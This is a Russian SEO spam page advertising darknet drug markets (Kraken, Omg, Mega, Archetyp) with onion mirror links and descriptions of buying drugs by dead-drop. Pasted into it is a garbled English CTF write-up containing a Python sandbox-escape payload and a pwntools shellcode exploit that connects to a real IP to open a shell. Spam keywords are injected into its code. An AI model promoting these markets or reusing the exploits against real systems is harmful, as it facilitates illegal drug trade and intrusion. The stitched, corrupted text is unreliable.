Кракен наркотики россия
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l!= 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % даркнет 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
Кракен наркотики россия - Кракен магазин наркотиков
Обязательно придумайте уникальный пароль, который ранее нигде не использовался. Мы выступаем за свободу слова. Д. Разработчики Tor порекомендовали пользователям iOS использовать Onion Browser, созданный Майком Тигасом (Mike Tigas) при поддержке Guardian Project. Недостатком является то, что он ограничивает скорость передачи данных до 25 Мбит/с на пользователя. Bm6hsivrmdnxmw2f.onion BeamStat Статистика Bitmessage, список, кратковременный архив чанов (анонимных немодерируемых форумов) Bitmessage, отправка сообщений в чаны Bitmessage. Onion The Pirate Bay торрент-трекер Зеркало известного торрент-трекера, не требует регистрации yuxv6qujajqvmypv. Для совершения покупок жми вход Нажмите для входа Безопасность mega все сделано для клиентов Для обеспечения безопасности клиентов, кракен принимает целый комплекс мер, защищающих персональную информацию. Onion Схоронил! Onion Probiv достаточно популярный форум по пробиву информации, обсуждение и совершение сделок по различным серых схемам. Результаты поиска зависят только от вас. Содержание В действительности на «темной стороне» можно найти что угодно. IP-адреса серверов скрыты. Torch, как и предвещает его название, постоянно выдает ссылки на ресурсы, связанные с наркоторговлей. Помимо этого, существует еще не один десяток сборников ссылок., например, OnionDir и Oneirun. Редакция: внимание! Hbooruahi4zr2h73.onion Hiddenbooru Коллекция картинок по типу Danbooru. Даже не отслеживая ваши действия в Интернете, DuckDuckGo предложит достойные ответы на ваши вопросы. Не открываются сайты. Стоп-лимит ордер позволяет ограничить убытки от открытой позиции или набрать позицию, если цена изменилась в соответствие с заданными условиями. Финансы. Onion/?x1 runion форум, есть что почитать vvvvvvvv766nz273.onion НС форум. Негативный отзыв о Kraken Но в то же время, другим, наоборот, поэтапная система верификации пришлась по душе. На Kraken торгуются фьючерсы на следующие криптовалюты: Bitcoin, Ethereum, Bitcoin Cash, Litecoin и Ripple. Д.). Проверка браузера tor Как работает Tor-Браузер Принцип работы tor браузера Вся суть и принцип работы браузера отображена в логотипе луковице. Onion SleepWalker, автоматическая продажа различных виртуальных товаров, обменник (сомнительный ресурс, хотя кто знает). В этом случае трафик сначала проходит через сеть Tor, а затем через VPN. Информация по уровням верифкации в табличном виде.
ОМГ официальный Не будем ходить вокруг, да около. Зарегистрирован, владельцем домена является нет данных, возраст сайта 13 лет. Независимо от легальности онион сайтов, для безопасного доступа к ним рекомендуется использовать специальный Tor Browser. Сразу заметили разницу? Что с "Гидрой" сейчас - почему сайт "Гидра" не работает сегодня года, когда заработает "Гидра"? Но основным направлением интернет магазина ОМГ является продажа психотропных препаратов таких как трава, различные колёса, всевозможные кристаллы, а так же скорость и ещё множество различных веществ. Вас приветствует обновленная и перспективная площадка всея русского. Эти сайты находятся в специальной псевдодоменной зоне.onion (внимательно смотри на адрес). Предложение от конкурентов под названием hola! Для того чтобы купить товар, нужно зайти на Omg через браузер Tor по onion зеркалу, затем пройти регистрацию и пополнить свой Bitcoin кошелёк. Первый это обычный клад, а второй это доставка по всей стране почтой или курьером. Org в луковой сети. Всего можно выделить три основных причины, почему не открывает страницы: некорректные системные настройки, антивирусного ПО и повреждение компонентов. Администрация открыто выступает против распространения детской порнографии. Onion - Freedom Image Hosting, хостинг картинок. На создание проекта, как утверждал Darkside в интервью журналу. Оплата картой или криптой. Legal обзор судебной практики, решения судов, в том числе по России, Украине, США. /head секции) в html коде страницы. Немного правее строки поиска вы можете фильтровать поиск, например по городам, используя который, сайт выдаст вам только товары в необходимом для вас месте. Устройство обойдется в сумму около 100 долларов, но в России его найти не так-то просто. Первый способ попасть на тёмную сторону всемирной паутины использовать Тор браузер.
Ну, любой заказ понятно, что обозначает. 4.6/5 Ссылка TOR зеркало Ссылка TOR зеркало http megadmeovbj6ahqw3reuqu5gbg4meixha2js2in3ukymwkwjqqib6tqd. Новый быстроразвивающийся аналог гидры, работает только через ТОР браузер. Подробнее: Криптовалютные кошельки: Биткоин, Ефириум, и другие малоизвестные кошельки Банковские карты: Отсутствуют! В этом способе есть одни минус, который кому- то возможно покажется пустяком, а кому-то hydra будет сильно мешать. Часто сайт маркетплейса заблокирован в РФ или даже в СНГ, поэтому используют обходные зеркала для входа, которые есть на нашем сайте. Если же вы сайт вошли на сайт Меге с определенным запросом, то вверху веб странички платформы вы найдете строку поиска, которая выдаст вам то, что вам необходимо. Если вы всё- таки захотите воспользоваться вторым способом, то ваш интернет- трафик будет передаваться медленнее. Так как сети Тор часто не стабильны, а площадка Мега Даркмаркет является незаконной и она часто находится под атаками доброжелателей, естественно маркетплейс может временами не работать. Все представленные в нашем каталоге даркнет сайтов официальные адреса обновлены до актуальных. Представлен в виде десктопного приложения под операционные системы Windows, Linux и MacOS. Onion Archetyp Market площадка полностью посвящена ПАВ, и работает только с криптовалютой Monero. Анонимность Изначально закрытый код сайта, оплата в BTC и поддержка Tor-соединения - все это делает вас абсолютно невидимым. Так же, после этого мы можем найти остальные способы фильтрации: по максимуму или минимуму цен, по количеству желаемого товара, например, если вы желаете крупный или мелкий опт, а так же вы можете фильтровать рейтинги магазина, тем самым выбрать лучший или худший в списке. Статья 327 УК РФ лишение свободы на срок до двух лет. Вот и я вам советую после совершения удачной покупки, не забыть о том, чтобы оставить приятный отзыв, Мега не останется в долгу! 5/5 Ссылка TOR зеркало Ссылка t/ TOR зеркало Даркнет сайты. Вместе с тем необходимо понимать, что она не может гарантировать чистоту работы обменных пунктов в дальнейшем. Мега на самом деле очень привередливое существо и достаточно часто любит пользоваться зеркалом. После такой информации у вас, наверняка, может появиться ощущение того, что в даркнете можно найти сплошь что-то запрещенное, но ведь это не совсем так. Самым простым способом попасть на сайт Mega DarkMarket является установка браузера Тор или VPN, без них будет горазда сложнее. Это используется не только для Меге. Форум это отличный способ пообщаться с публикой сайта, здесь можно узнать что необходимо улучшить, что на сайте происходит не так, так же можно узнать кидал, можно оценить качество того или иного товара, форумчане могут сравнивать цены, делиться впечатлениями от обслуживания тем или иным магазином. Onion Probiv достаточно популярный форум по пробиву информации, обсуждение и совершение сделок по различным серых схемам. 4.6/5 Ссылка TOR зеркало Ссылка https shkaf. Администрация сайта трепетно относится к каждому клиенту. На главной странице будут самые популярные магазины Маркетплейса Мега. Пока пополнение картами и другими привычными всеми способами пополнения не работают, стоит смириться с фактом присутствия нюансов работы криптовалют, в частности Биткоин. Для безопасности и полной анонимности необходимо использовать только полный кошелек Monero GUI, без передачи приватного ключа. И можно сказать, что это отчасти так и есть, ведь туда попасть не так уж и просто. Также обещают исправить Qiwi, Юмани, Web Money, Pay Pal. Важно знать, что ответственность за покупку на Gidra подобных изделий и продуктов остается на вас. Список ссылок обновляется раз в 24 часа. Немного подождав попадёте на страницу где нужно ввести проверочный код на Меге Даркнет. Администрация форума активно сотрудничает с властями сразу нескольких государств).4/5 Ссылка TOR зеркало Ссылка TOR зеркало http xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid. История посещений, действий и просмотров не отслеживается, сам же пользователь почти постоянно может оставаться анонимом. Постараюсь объяснить более обширно.